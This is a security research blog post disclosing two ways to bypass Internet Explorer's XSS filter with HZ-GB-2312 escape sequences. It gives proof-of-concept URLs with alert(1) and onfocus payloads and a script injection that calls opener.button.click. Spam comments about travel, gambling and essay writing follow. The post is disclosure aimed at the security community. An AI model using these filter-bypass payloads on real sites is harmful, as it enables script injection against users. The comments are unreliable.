Tuesday, September 29, 2015

Bypassing IE's XSS Filter with HZ-GB-2312 escape sequence

I would like to share IE XSS Filter bypass with escape sequence of HZ-GB-2312 encoding.

To use this vector, we need the target page's Content-Type header which charset is not specified in.

Bypass 1

PoC:
http://vulnerabledoma.in/char_test?body=%3Cx~%0Aonmouseover=alert(1)%3EAAA
No user interaction version:
http://vulnerabledoma.in/char_test?body=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a

"~[0x0A]" is HZ-GB-2312 escape sequence. It seems that XSS filter makes an exception for "~[0x0A]" .

If Content-Type header has proper charset, it does not work:
http://vulnerabledoma.in/char_test?charset=utf-8&body=%3Cx~%0Aonmouseover=alert(1)%3EAAA

On the other hand, if meta tag has proper charset, it still works:
http://vulnerabledoma.in/xssable?q=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a

Bypass 2

"~{" is also HZ-GB-2312 escape sequence. We can use this for bypass. We can call same-origin method in string literal.

PoC is here:
http://l0.cm/xssfilter_hz_poc.html

Please click the "go" button. You can confirm element.click method is called.

"click" is called from the following code:
http://vulnerabledoma.in/xss_js?q=%22%3B~{valueOf:opener.button.click}//
<script>var q="";~{valueOf:opener.button.click}//"</script>

Also, you can use "toString":
http://vulnerabledoma.in/xss_js?q=%22%3B~{toString:opener.button.click}//

<script>var q="";~{toString:opener.button.click}//"</script>

That's all. See you next month!
Posted by at
Labels: , , , ,

5 comments:

  1. Doanh DoanhMarch 24, 2021 at 1:57 AM

    Những Chuyến Đi Cuộc Đời
    Ngau Hung Du Lich
    Tri Thuc Du Lich
    Book Ve Du Lich Gia Re

    ReplyDelete
  2. UnknownMarch 20, 2022 at 11:36 PM

    Wow! This can be one particular of the most useful blogs We have ever arrive across on this subject 먹튀검증

    ReplyDelete
  3. Lee KnightMay 29, 2022 at 11:48 AM

    Hey! There you are! Our service https://expertpaperwriter.com/papernow-org-review/ focus on keeping our prices low, but unlike other academic writing services online, we never sacrifice quality for the sake of price. We thrive on service orientation; our mission is to increase customer loyalty by providing nonparallel services and after sales support.

    ReplyDelete
  4. Ariel WilsonNovember 3, 2022 at 11:05 PM

    There are several methods for avoiding XSS filters, but the ideal is to employ a best research data collection services that is particularly built to avoid these filters. You may be confident that your study data will be collected without incident if you choose a service like this.

    ReplyDelete
  5. AnonymousDecember 5, 2022 at 6:39 AM

    A participant also could play colors, odd 토토사이트 and even numbers, amongst others. A bet on a single number pays 35 to 1, together with the zero and 00. Bets on pink or black, odd and even pay 1 for 1, and even cash. In the 1960s and early Seventies, Richard Jarecki won about $1.2 million at dozens of European casinos. He claimed that he was using a mathematical system designed on a powerful pc. In actuality, he simply noticed greater than 10,000 spins of every roulette wheel to find out} flaws within the wheels.

    ReplyDelete

Subscribe to: Post Comments (Atom)